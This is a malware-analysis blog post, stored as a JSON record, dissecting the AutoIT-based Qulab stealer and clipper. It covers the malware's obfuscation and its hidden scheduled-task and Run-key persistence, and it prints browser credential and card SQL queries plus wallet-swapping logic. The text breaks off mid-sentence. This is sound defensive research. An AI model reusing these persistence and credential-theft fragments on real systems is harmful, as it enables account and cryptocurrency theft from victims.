{ "id": "4786cab7-5310-467f-817b-cdfd6f4ef080", "created_at": "2026-04-06T00:13:51.585366Z", "updated_at": "2026-04-10T13:11:20.180936Z", "deleted_at": null, "sha1_hash": "061edf663622d396aedb795093b66293f85101e6", "title": "Let’s play with Qulab, an exotic malware developed in AutoIT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2308851, "plain_text": "Let’s play with Qulab, an exotic malware developed in AutoIT\r\nPublished: 2019-03-25 · Archived: 2026-04-05 20:26:02 UTC\r\nAfter some issues that kept me far away from my researches, it’s time to put my hands again on some sympathetic\r\nstuff. This one is technically and finally my real first post of the year (The anti-VM one was a particular case).\r\nSo today, we will dig into Qulab Stealer + Clipper, another password-stealer that had my attention to be (on my\r\npoint view) an exotic one, because it is fully developed in AutoIT and have a really cool obfuscation technique\r\nthat occupied me for some times. Trends to have malware that is coded in some languages different than C, C++,\r\n.NET or Delphi is not new, there is a perfect case with the article made by Hasherezade earlier this year for a\r\nstealer developed in GoLang (that I highly recommend taking a look on it).\r\nNormally, using AutoIT scripts in that area is pretty common. It’s widely used as a packer for hiding detection or\r\nas a node into an infection chain, but as a whole password-stealer, it’s not the same. I could say it’s a particular\r\ncase because it’s resale with support on the black market.\r\nEven if as usual, techniques remains the same for the stealing features, it’s always entertaining to see how there is\r\nplenty of ways to achieve one simple goal. Also, the versatility on this one is what makes me overwhelmed my\r\ncuriosity and burning all my sleep time for some reasons…\r\nQulab is focusing on these features:\r\nBrowser stealing\r\nWallet Clipper\r\nFTP creds\r\nDiscord / Telegram logs\r\nSteam (Session / Trade links / 2FA Authenticator by abusing a third party software)\r\nTelegram Bot through a proxy\r\nGrabber\r\nAuto IT?\r\nAs I mentioned in the intro, Qulab is coded in AutoIT, for people that are really not in touch it or have no idea\r\nabout it, it is an automation language who has a syntax similar to the BASIC structure, it’s designed to work only\r\non Microsoft Windows.\r\nThey are two way to execute AutoIT scripts :\r\nIf the script is run with the .au3 format, AutoIT dependances are required and all the libraries that are\r\nnecessary to run it.\r\nIf the script is compiled all the libraries are added into it for avoiding dependances. It means that you don’t\r\nneed to install AutoIT for executing PE.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 1 of 31\n\nWhen the instructions are compiled into an executable file, it’s easy to catch if we are analyzing an AutoIT script\r\nby a simply checking some strings, so there already some Yara rules that made the task to confirm that is the case.\r\nrule AutoIt\r\n{\r\nmeta:\r\nauthor = \"_pusher_\"\r\ndate = \"2016-07\"\r\ndescription = \"www.autoitscript.com/site/autoit/\"\r\nstrings:\r\n$aa0 = \"AutoIt has detected the stack has become corrupt.\\n\\nStack corruption typical\r\n$aa1 = \"AutoIt Error\" wide ascii nocase\r\n$aa2 = \"Missing right bracket ')' in expression.\" wide ascii nocase\r\n$aa3 = \"Missing operator in expression.\" wide ascii nocase\r\n$aa4 = \"Unbalanced brackets in expression.\" wide ascii nocase\r\n$aa5 = \"Error parsing function call.\" wide ascii nocase\r\n$aa6 = \"\u003e\u003e\u003eAUTOIT NO CMDEXECUTE\u003c\u003c\u003c\" wide ascii nocase\r\n$aa7 = \"#requireadmin\" wide ascii nocase\r\n$aa8 = \"#OnAutoItStartRegister\" wide ascii nocase\r\n$aa9 = \"#notrayicon\" wide ascii nocase\r\n$aa10 = \"Cannot parse #include\" wide ascii nocase\r\ncondition:\r\n5 of ($aa*)\r\n}\r\nOn my side, I will not explain the steps or tools to extract the code, they are plenty of tutorials on the internet for\r\nexplaining how it’s possible to extract some AutoIt scripts. The idea here is to focus mainly on the malware, not\r\non the extracting part…\r\nCode Obfuscation\r\nAfter extracting the code from the PE, it’s easy to guess that some amazing stuff is coming to our eyes by just\r\nlooking the amount of code… The analysis of this malware will be some kind of challenge.\r\ncat Qulab.au3 | wc -l\r\n21952 // some pain incomming\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 2 of 31\n\nThe source code is really (really) obfuscated but not hard to clean it. it takes just quite some times with the help of\r\nhomemade scripts to surpass it. But as an analyst that wants to have information, a simple dump of the process\r\nduring the execution and the report a sandbox is sufficient to understand the main tasks.\r\nFor non-technical people, I have created a dedicated page on GitHub for being able to read and learn easily the\r\nAutoIT fundamentals. I highly recommend to open it during the reading of this article, it will be easier. you had\r\nalso to read the official AutoIT FAQ for understanding the API. Unfortunately, it’s not complete as the Microsoft\r\nMSDN documentation but it’s enough about the basic principles of this language…\r\nIt’s impossible to explain all form of obfuscation in this malware, but this is a summary of the main tricks.\r\nVariable \u0026 Function Naming convention\r\nAll variables except few exceptions are in that form\r\n\\$A\\d[A-F0-9]{3,10}\r\nIt’s wonderful to see over ten thousand (and more) variables like this into the whole script (sarcasm)\r\n$A18A4000F15\r\n$A5AA4204E10\r\n$A0FA4403A33\r\n$A55A4601801\r\n$A24A4804C5C\r\n...\r\nGarbage conditions\r\nWhen there is an obfuscated code, there is obviously a huge amount of nonsense conditions or unused functions. It\r\ndoesn’t take a long time to get the idea on Qulab because they are easily catchable by pure logic, take an example\r\non this one :\r\nFUNC A5D10600720(BYREF $A37E6C01A00,$A183A702F3C)\r\n IF NOT ISDECLARED(\"SSA5D10600720\") THEN\r\n ENDIF\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 3 of 31\n\n...\r\n ...\r\nENDFUNC\r\nThis a classical pattern, the condition is just checking if a variable (“SS” + Function Name) is not declared, inside\r\nthere is always some local variables that are initiated for purposes of the functions and most of the time they are\r\ncoming from the master array. By deobfuscating them, the whole conditions on this pattern can be removed\r\nvariables are switched by their corresponding values, it permits to delete a lot of codes.\r\nUnused Functions\r\nAnother classy scheme is to find some unused functions, and this permit to clean effectively thousands of lines of\r\njunk code by creating a script for the purposes or using some User-defined functions made by the AutoIT\r\ncommunity.\r\nInitiating Variables and using them\r\nGLOBAL LOCAL $VARIABLE_1 = FUNC1(ARRAY[POS])\r\n...Code....\r\nGLOBAL LOCAL $VARIABLE_455 = $VARIABLE_1\r\n...Code...\r\nGLOBAL LOCAL $VARIABLE_9331 = VARIABLE_455 \u003c- Final Value\r\n\u003e Initiating them by a condition\r\nIF $A4A7AC0550A=DEFAULT THEN $A4A7AC0550A=-NUMBER($A198A005329)\r\nIF $A2F7AD03E54=DEFAULT THEN $A2F7AD03E54=-NUMBER($A2C8A10261F)\r\nIF $A3D7AE0071E=DEFAULT THEN $A3D7AE0071E=-NUMBER($A218A202B4D)\r\nIF $A3F7AF01354=DEFAULT THEN $A3F7AF01354=-NUMBER($A2A8A300E5F)\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 4 of 31\n\n\u003e Using count variable into a 2D Array, with a value that is stored inside a 20 000 length array.\r\n$A31E5E11A1F[NUMBER($A2646512725)][NUMBER($A0C46615D39)]+=NUMBER($A5246713208)\r\n\u003e Hiding code error integers by a mixture of multiple functions and variables.\r\nRETURN SETERROR($A2C07504A0A,NUMBER($A411740414D),NUMBER($A6017502D45))\r\nCode Execution\r\nThis malware has an unorthodox way to execute code and it’s pretty cool.\r\n1. Read the directives, follow them to go to the main function\r\n2. The main function will set up the master array (I will explain this later)\r\n3. When this function is done, the script will go again to the beginning by a purely logical way after the\r\ndirectives, and search for Global variables and instructions, for our case, it will be some global variables.\r\n4. When all of the Global Variables have been initiated, it will skip all the functions because they are simply\r\nnot called (for the moment), and will try to reach some exploitable instruction (as I explained above).\r\nWhen finally some code is reachable, a domino effect occurs, an initiated variable will call one function,\r\nthat inside it will call one or multiple functions, and so on.\r\n5. During the same process, there is also some encoded files that are hardcoded into the code and injected into\r\nthe code for some specific tasks. When every setup tasks are done, it’s entering into an infinite loop for\r\nspecific purposes.\r\nIn the end, it could be schematized like this.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 5 of 31\n\nDirectives are leading the road path\r\nEverything that is starting with ‘#’ is a directive, this is technically the first thing that the script will check, and\r\nhere, it’s configured to go to a specific function at all cost that is “A5300003647_”, this one is the main function.\r\n#СЪЕБИСЬ ОТСЮБДА ДУДА ТЫ ССАНАЯ БЛЯХА МУХА\r\n#NoTrayIcon\r\n#OnAutoItStartRegister \"A5300003647_\"\r\n#NoTrayIcon – Hide the AutoIT icon on the tray task\r\n#OnAutoItStartRegister – The first function that will be called at the beginning of the script (an equivalent of the\r\nmain function)\r\nThe Main function is VIP\r\nThe first function of Qulab is critical because this is where almost all the data is initialized for the tasks. The\r\nvariable $DLIT is storing a “huge” string that will be split with the delimiter “o2B2Ct” and stored into the array\r\n$OS\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 6 of 31\n\nNote: the name mentioned here is the one that will be used for this stealer script, results may vary between\r\nsamples but the idea remains the same.\r\nFUNC A5300003647_()\r\n FOR $AX0X0XA=1 TO 5\r\n LOCAL $DLIT=\"203020o2B2Ct203120o...\"\r\n GLOBAL $A5300003647,$OS=STRINGSPLIT($DLIT,\"o2B2Ct\",1)\r\n IF ISARRAY($OS) AND $OS[0]\u003e=19965 THEN EXITLOOP\r\n SLEEP(10)\r\n NEXT\r\nENDFUNC\r\n \r\nGlobal Variables are the keys\r\nGlobal Variables are certainly the main focus of Qulab, they are nowhere and everywhere, they are so impactful\r\nwith the master array that a single modification of one Variable can have a domino effect for the whole malware\r\nthat could end to a segmentation fault or anything else that could crash the script.\r\nWhen a variable is initialized, there are multiple steps behind it :\r\n1. Selecting a specific value from the master array\r\n2. Converting the value to a string\r\n3. Profit\r\nGLOBAL $A1D7450311E=A5300003647($OS[1])\r\nthe function “A5300003647” is, in fact, an equivalent of “From Hex” feature, and it’s converting 2 bytes by 2\r\nbytes the values.\r\nFUNC A5300003647($A5300003647)\r\n LOCAL $A5300003647_\r\n FOR $X=1 TO STRINGLEN($A5300003647) STEP 2\r\n $A5300003647_\u0026=CHR(DEC(STRINGMID($A5300003647,$X,2)))\r\n NEXT\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 7 of 31\n\nRETURN $A5300003647_\r\nENDFUNC\r\nBy just tweaking the instructions of the AutoIT scripts, with the help of some adjustments (thanks homemade\r\ndeobfuscate scripts and patience), variables are now almost fully readable.\r\nAfter modifying our 19966 variables (that’s a lot), we can see clearly most of the tasks that the malware has on the\r\npipe statically. this doesn’t mean that is done with this part, It’s only a first draft and it needs to be cleaned again\r\nbecause there is a lot of unfinished tasks and of course as I explained above, most of them are unused.\r\nMain code\r\nAfter all that mess to understand what is the correct path to read the code, the script is now entering into the core\r\nstep, The more serious business begins right now.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 8 of 31\n\nTo summarize all the task, this is briefly what’s going on :\r\nSetting up, Variables that are configured in the builder\r\nName of the payload\r\nName of the schedule task\r\nName of the schedule task folder\r\nname of the hidden AppData folder where the malware will do the tasks\r\nWallets\r\nHide itself\r\nDo all the stealing tasks\r\nDecoding \u0026 load dependances when it’s required\r\nMake the persistence\r\nAnd more… 🙂\r\nWhere is the exit?\r\nBetween two functions there is sometimes global variables that declared or there are also sneaky calls that have an\r\nimpact into the payload itself. They could not be really seen at a first view, because they are drowned into an\r\namount of code. So 1 or 2 lines between dozens of functions could be easily forgettable.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 9 of 31\n\nwe can see that is also indicating the specific method that will be called at the end of everything.\r\nONAUTOITEXITREGISTER(\"A1AA3F04218\")\r\nSo with just small research, we can see our function that will be called at the end of the script between a huge\r\namount of spaghetti code.\r\nIts in fact, closing crypt32.dll module, thats is used for the CryptoAPI.\r\nGLOBAL $A1A48943E37=DLLOPEN(\"crypt32.dll\")\r\nSome curiosities to disclose\r\nHomemade functions or already made?\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 10 of 31\n\nFor most of the tasks, the malware is using a lot of “User Defined Functions” (UDF) with some tweaks, as\r\nexplained on the AutoIT FAQ: “These libraries have been written to allow easy integration into your own scripts\r\nand are a very valuable resource for any programmer”. it confirms more and more that open-source code and\r\nprogramming forums are useful for both sides (good \u0026 bad), so for developing malware it doesn’t require to be a\r\nwizard, everything is at disposition and free.\r\nAlso for Qulab, it’s confirmed that he used tweaked or original UDF for :\r\nSQL content\r\nArchiving content\r\nTelegram API\r\nWindows API\r\nMemory usage\r\nMemory optimization\r\nAutoIT programs are known to be greedy in memory consumption and could be probably a risk to be more\r\ndetectable. At multiple time, the malware will do a task to check if there is a possibility to reduce the amount of\r\nallocated memory, by removing as much as possible, pages from the working set of the process. The manipulation\r\nrequired to use EmptyWorkingSet and could permit to reduce by half the memory usage of the program.\r\n \r\nFUNC A0E64003F0C($A1B85D1000C=0)\r\n IF NOT $A1B85D1000C THEN $A1B85D1000C=EXECUTE(\" @AutoItPID \")\r\n LOCAL $A3485F11D1D=DLLCALL(\"kernel32.dll\",\"handle\",\"OpenProcess\",\"dword\",(($A209DF54B2B\u003c1536)?128\r\n IF @ERROR OR NOT $A3485F11D1D[0] THEN RETURN SETERROR(@ERROR+20,@EXTENDED,0)\r\n LOCAL $A5F55F1392E=DLLCALL(EXECUTE(\" @SystemDir \")\u0026\"\\psapi.dll\",\"bool\",\"EmptyWorkingSet\",\"handle\r\n RETURN 1\r\nENDFUNC\r\nFirst, it will grab the PID value of the AutoIT-compiled program by executing the macro @AutoItPID, then\r\nopening it with OpenProcess. But one of the argument is quite obscure\r\n \r\n(($A209DF54B2B\u003c1536)?1280:4352)\r\nwhat is behind variable $A209DF54B2B? let’s dig into it…\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 11 of 31\n\nGLOBAL CONST $A209DF54B2B=A2054F01A5F()\r\nFUNC A2054F01A5F()\r\n LOCAL $A1656715F1D=DLLSTRUCTCREATE(\"struct;dword OSVersionInfoSize;dword MajorVersion;dword Mino\r\n DLLSTRUCTSETDATA($A1656715F1D,1,DLLSTRUCTGETSIZE($A1656715F1D))\r\n LOCAL $A5F55F1392E=DLLCALL(\"kernel32.dll\",\"bool\",\"GetVersionExW\",\"struct*\",$A1656715F1D)\r\n IF @ERROR ORNOT$A5F55F1392E[0] THENRETURNSETERROR(@ERROR,@EXTENDED,0)\r\n RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($A1656715F1D,2),-8),DLLSTRUCTGETDATA($A1656715F1D,3)))\r\nENDFUNC\r\nThis is WinAPI function will retrieve the version of the current operating system used on the machine, the value\r\nreturned is into a binary format. So if we look back and check with the official API.\r\n//\r\n// _WIN32_WINNT version constants\r\n//\r\n#define _WIN32_WINNT_NT4 0x0400 // Windows NT 4.0\r\n#define _WIN32_WINNT_WIN2K 0x0500 // Windows 2000\r\n#define _WIN32_WINNT_WINXP 0x0501 // Windows XP\r\n#define _WIN32_WINNT_WS03 0x0502 // Windows Server 2003\r\n#define _WIN32_WINNT_WIN6 0x0600 // Windows Vista\r\n#define _WIN32_WINNT_VISTA 0x0600 // Windows Vista\r\n#define _WIN32_WINNT_WS08 0x0600 // Windows Server 2008\r\n#define _WIN32_WINNT_LONGHORN 0x0600 // Windows Vista\r\n#define _WIN32_WINNT_WIN7 0x0601 // Windows 7\r\n#define _WIN32_WINNT_WIN8 0x0602 // Windows 8\r\n#define _WIN32_WINNT_WINBLUE 0x0603 // Windows 8.1\r\n#define _WIN32_WINNT_WINTHRESHOLD 0x0A00 // Windows 10\r\n#define _WIN32_WINNT_WIN10 0x0A00 // Windows 10\r\nWith knowing the Windows Version with this function, the AutoIT script is now able to open the process correctly\r\nand analyzing it. The last task is to purge the unused working set by calling EmptyWorkingSet for cleaning some\r\nunnecessary memory.\r\nTask scheduling\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 12 of 31\n\nTask scheduling with stealers is summarized with one line of code, a simple and effective ShellExecute command\r\nwith schtask.exe to execute periodically something, as a persistence trick. Here it’s a little bit more advanced than\r\nusual, in multiple points by using a TaskService Object\r\n$A60FD553516=OBJCREATE(\"Schedule.Service\")\r\n$A60FD553516.Connect()\r\nThe new task is set with a flag value of 0, as explained in the MSDN Documentation, it’s a mandatory value.\r\n$A489E853A1E=$A60FD553516.NewTask(0)\r\nTo be less detectable, some tricks as being done to look like legit as possible by detailing that the process has been\r\nmade by the correct user, the description, the name of the task and the task folder is adjusted by what the customer\r\nwants.\r\n$A4A9E951E11=$A489E853A1E.RegistrationInfo()\r\n$A4A9E951E11.Description()= $A487E851D38\r\n$A4A9E951E11.Author()=EXECUTE(\" @LogonDomain \")\u0026\"\\\"\u0026EXECUTE(\" @UserName \")\r\nAfter some other required values to be configured that is not really necessary to talk, it’s way more interesting to\r\ntalk about the setting part of this Task Service because it is quite interesting.\r\nTo maximize the yield, Qulab tweaks the service whenever the situation :\r\nThe laptop is not on charge\r\nThe battery is low\r\nNetwork available or not\r\nIn the end, every minute, the task manager will run the task by executing the malware into the hidden repository\r\nfolder in %APPDATA%.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 13 of 31\n\n$A4B9EA50562=$A489E853A1E.Settings()\r\n$A4B9EA50562.MultipleInstances() = 0\r\n$A4B9EA50562.DisallowStartIfOnBatteries()= FALSE\r\n$A4B9EA50562.StopIfGoingOnBatteries()= FALSE\r\n$A4B9EA50562.AllowHardTerminate()= TRUE\r\n$A4B9EA50562.StartWhenAvailable()= TRUE\r\n$A4B9EA50562.RunOnlyIfNetworkAvailable() FALSE\r\n$A4B9EA50562.Enabled()= TRUE\r\n$A4B9EA50562.Hidden()= TRUE\r\n$A4B9EA50562.RunOnlyIfIdle()= FALSE\r\n$A4B9EA50562.WakeToRun()= TRUE\r\n$A4B9EA50562.ExecutionTimeLimit()= \"PT1M\" // Default PT99999H\r\n$A4B9EA50562.Priority()= 3 // Default 5\r\n$A3E9EB51B0D=$A489E853A1E.Principal()\r\n$A3E9EB51B0D.Id()=EXECUTE(\" @UserName \")\r\n$A3E9EB51B0D.DisplayName()=EXECUTE(\" @UserName \")\r\n$A3E9EB51B0D.LogonType()=$A0B8E352D04\r\n$A3E9EB51B0D.RunLevel()= 0\r\nAnother Persistence?\r\nA classic one is used\r\n \r\n \r\nIF NOT A3F64500C0D($A00DEB51215,$A35DEF51B61) THEN\r\nREGWRITE(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\",\r\n $A00DEB51215,\"REG_SZ\",\"\"\"\"\u0026$A104A053309\u0026\"\\\"\u0026$A60DE955B5F\u0026\"\"\"\")\r\n \r\n \r\nThere is nothing much to say more, about this part…\r\nEncoding is not encryption\r\nWhen I was digging into the code, I found a mistake that makes me laugh a little… The classical quote for saying\r\nthat base64 is encryption. So maybe after this in-depth analysis, the malware developer will fix his mistake (or\r\njust insulting me :’) )\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 14 of 31\n\nMalware Features\r\nClipper\r\nIf you are unfamiliar with what is a clipper, it’s in fact really simple… The idea is to alter something that is in the\r\nclipboard content with the help of some filters/rules that is most of the cases simplify as regular expressions. If it\r\nmatches with something, it will modify the amount of data caught with something else that was configured. It’s\r\nheavily used for swapping crypto wallet IDs from the victim to the attacker one. This is also the case with Qulab,\r\nit’s focusing on Wallets \u0026 Steam trade links.\r\nThis piece of code represent the core of the clipper :\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 15 of 31\n\nSo that are the steps:\r\n1. Execute a script for checking if there any new data to send for the attacker\r\n2. Checking if the ongoing task is present on the task scheduler.\r\n3. Cleaning unnecessary Working Set (see the memory optimization explained above)\r\n4. Make a pause in the loop for 200 ms\r\n5. Get the content of the clipboard with CLIPGET\r\n6. Check all the wallet, if it matches, substitute with the wished value.\r\n1. Put the modified content on the Clipboard with CLIPPUT\r\n2. Repeat\r\nAll the values from the different wallet that the attacker wants to swap are stored at the beginning of the code\r\nsection. By pure speculations, I’m considering that are the values that are configured in the builder.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 16 of 31\n\nCurrent List of Cryptocurrency Wallet that the stealer is switching.\r\nBitcoin Bitcoin Cash Bitcoin Gold Bytecoin\r\nCardano Lisk Dash Doge\r\nElectronium Ethereum Graft Litecoin\r\nMonero Neo QIWI Qtum\r\nSteam Trade Link Stratis VIA WME\r\nWMR WMU WMX WMZ\r\nWaves Yandex Money ZCash\r\nBrowser Stealer\r\nQulab is some kind of a puzzle with multiple pieces and each piece is also another puzzle. Collectings and sorting\r\nthem to solve the entire fresco is some kind of a challenge. I can admit for the browser part, even if the concept is\r\neasy and will remain always the same (for the fundamentals of a Password Stealer), the way that it was\r\nimplemented is somewhat clever.\r\nAt first, every browser that is supported by the malware is checked in turn, with specific arguments :\r\nThe Browser path\r\nThe files that the stealer wants to grab with “|” as a delimiter\r\nThe Name of the browser\r\nIt goes to a very important function that will search (not only for the browser), these kinds of files :\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 17 of 31\n\nwallet.dat\r\nLogin Data\r\nformhistory.sqlite\r\nWeb Data\r\ncookies.sqlite\r\nCookies\r\n.maFile\r\nIf they are matching, it enters into a loop that will save the path entry and storing it into one master variable with\r\n“|” as a delimiter for every important file.\r\nWhen all the files are found, it only needs to do some regular expression to filter and split the data that the\r\nmalware and to grab.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 18 of 31\n\nAfter inspecting and storing data from browsers that are present in the list, serious business is now on the\r\npipe… One of the binaries that are hardcoded in base64 is finally decoded and used to get some juicy data and like\r\nevery time it’s the popular SQLite3.dll that was inside all of this.\r\nSomething interesting to notice is that the developer made some adjustment with the official AutoIT FUD For\r\nSQLite3 and removed all the network tasks, for avoiding downloading the libraries (32 or 64 bits) and of course\r\nbe less detectable.\r\nThe file is saved into the %ROAMING% directory, and will have the name :\r\nPE_Name + “.sqlite3.module.dll”\r\nThe routine remains the same for each time this library is required :\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 19 of 31\n\n1. Checking with a patched _SQLite_GetTable2d, the SQL Statement that needs to be executed \u0026 tested is a\r\nvalid one.\r\n2. The SQL Table is put into a loop and each iteration of the array is verified by a specific regular expression.\r\n3. If the content is found, it enters into another condition that will simply add them into the list of files \u0026\r\ninformation that will be pushed in the malicious archive.\r\nIn the end, these requests are executed on browser files.\r\n \r\nSELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cards;\r\nSELECT username_value, password_value, origin_url, action_url FROM logins;\r\nselect host, 'FALSE' as flag, path, case when isSecure = 1 then 'TRUE' else 'FALSE' end as secure, ex\r\nselect host_key, 'FALSE' as flag, path, case when is_secure = 1 then 'TRUE' else 'FALSE' end as secu\r\nCurrent List of supported browsers\r\n360 Browser Amigo\r\nAVAST\r\nBrowser\r\nBlisk Breaker Browser\r\nChromium Chromodo CocCoc CometNetwork Browser Comodo Dragon\r\nCyberFox Flock Browser Ghost Browser Google Chrome IceCat\r\nIceDragon\r\nK-Meleon\r\nBrowser\r\nMozilla Firefox NETGATE Browser Opera\r\nOrbitum Browser Pale Moon QIP Surf SeaMonkey Torch\r\nUCBrowser uCOZ Media Vivaldi Waterfox Yandex Browser\r\nFTP\r\nThe FTP is rudimentary but is doing the task, as far than it looks, it’s only targeting FileZilla software.\r\nGrabber\r\nQulab doesn’t have an advanced Grabber feature, it’s really simplistic compared to stealers like Vidar. It simplifies\r\nby just one simple line… It’s using the same function as explained above with the browsers, with the only\r\ndifference, it’s focusing on searching specific file format on the desktop directory\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 20 of 31\n\nTargeted files are\r\n.txt\r\n.maFile\r\nwallet.dat\r\nWallet\r\nNothing to say more than Exodus is mainly targeted.\r\nDiscord\r\nDiscord is more and more popular nowadays, so it’s daily routine now to see this software targeted by almost all\r\nthe current password-stealer on the market.\r\nSteam \u0026 Steam Desktop Authenticator\r\nThe routine for Steam is almost identical to the one that I explained in Predator and will remain the same until\r\nSteam will change some stuff into the security of his files (or just changing the convention name of them).\r\n1. Finding the Steam path into the registry\r\n2. searching the config folder\r\n3. searching recursively into it for grabbing all the ssfn files\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 21 of 31\n\nBut! There is something different on this Password-stealer than all the other that I’ve seen currently. Its also\r\ntargeting Steam Desktop Authenticator a Third-party software as explained on the official page as a desktop\r\nimplementation of Steam’s mobile authenticator app. It’s searching for a specific and unique file “.maFile”, it’s\r\nalready mentioned above in the Grabber part and The Browser Stealing part. This file contains sensitive data of\r\nthe steam account linked with the Steam mobile authenticator app.\r\nSo this malware is heavily targeting Steam :\r\nClipping Steam Trade Links\r\nStealing steam sessions\r\nStealing 2FA main file from a Third-Party software.\r\nInformation log\r\nIt’s a common thing with stealer to have an information file that logs important data from the victim’s machine.\r\nIt’s also the case on Qulab, it’s not necessary to explain all the part, I’m just explaining here simply with which\r\ncommand it was able to do get the pieces of information.\r\nOS Version @OSVersion\r\nOS Architecture @OSArch\r\nOS Build @OSBuild\r\nUsername @UserName\r\nComputer Name @ComputerName\r\nProcessor ExecQuery(“SELECT * FROM Win32_VideoController”,”WQL”,16+32)\r\nVideo Card ExecQuery(“SELECT * FROM Win32_Processor”,”WQL”,16+32)\r\nMemory STRINGFORMAT(“%.2f Gb”,MEMGETSTATS()[1]/1024/1024)\r\nKeyboard Layout ID @KBLayout\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 22 of 31\n\nResolution @DesktopWidth \u0026 @DesktopHeight \u0026 @DesktopDepth \u0026 @DesktopRefresh\r\nNetwork\r\nNot seen due to the proxy, there is a network request done on ipapi.co for getting all the network information of\r\nthe victim’s machine.\r\n \r\n$A4AC5512B62=INETREAD(\"https://ipapi.co/json\",3)\r\n \r\n \r\nThe JSON result is consolidated into one variable and saved for the final log file.\r\nIF STRINGLEN($A4AC5512B62) \u003e 75 THEN\r\n $A2B1F55481F=A4604603206(BINARYTOSTRING($A4AC5512B62))\r\n $A280FD53C4B =\" - IP: \" \u0026A211460135A($A2B1F55481F,\"[ip]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - Country: \" \u0026A211460135A($A2B1F55481F,\"[country_name]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - City: \" \u0026A211460135A($A2B1F55481F,\"[city]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - Region: \" \u0026A211460135A($A2B1F55481F,\"[region]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - ZipCode: \" \u0026A211460135A($A2B1F55481F,\"[postal]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - ISP: \" \u0026A211460135A($A2B1F55481F,\"[org]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - Coordinates: \" \u0026A211460135A($A2B1F55481F,\"[latitude]\")\u0026\", \"\u0026A211460135A($A2B1F55\r\n \u0026\" - UTC: \" \u0026A211460135A($A2B1F55481F,\"[utc_offset]\")\u0026\" (\"\u0026A211460135A($A2B1F55481F,\r\nENDIF\r\n \r\nSofts\r\n \r\n \r\n$A12EF151C00=A5944E0550E(\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\",\"\"\r\nFOR $A51E7205400 = 1 TO $A12EF151C00[0][0]\r\n $A3B1F954B63 \u0026=\" - \"\u0026$A12EF151C00[$A51E7205400][0]\u0026EXECUTE(\" @CRLF \")\r\nNEXT\r\n \r\n \r\nProcess List\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 23 of 31\n\nBecause AutoIT is based for doing automation task script, almost all the basic commands from the WinAPI are\r\nalready integrated, so by simply using the ProcessList() call, the list of all the processes are stored into an array.\r\n \r\n \r\n$A2EEFA54E30=PROCESSLIST()\r\nFOR $A51E7205400=1 TO $A2EEFA54E30[0][0]\r\n $A481FB54A60\u0026=\" - \"\u0026$A2EEFA54E30[$A51E7205400][0]\u0026\" / PID: \"\u0026$A2EEFA54E30[$A51E7205400][1]\u0026EXECUT\r\nNEXT\r\n \r\nBy mixing all this data, the log file is finally done:\r\n \r\n \r\n# /===============================\\\r\n# |=== QULAB CLIPPER + STEALER ===|\r\n# |===============================|\r\n# |==== BUY CLIPPER + STEALER ====|\r\n# |=== http://teleg.run/QulabZ ===|\r\n# \\===============================/\r\nDate: XX.XX.2019, HH:MM:SS\r\nMain Information:\r\n- ...\r\nOther Information:\r\n- ...\r\nSoft / Windows Components / Windows Updates:\r\n- ...\r\nProcess List:\r\n- ...\r\n \r\n \r\nInstructions log\r\nFor probably helping his customers when the malware is catching data from specific software other than browsers,\r\nan additional file is added to give some explanations to fulfill the task entirely after the stealing process, step by\r\nstep and stores into “Инструкция по установке.txt”\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 24 of 31\n\nInstructions are unique for each of 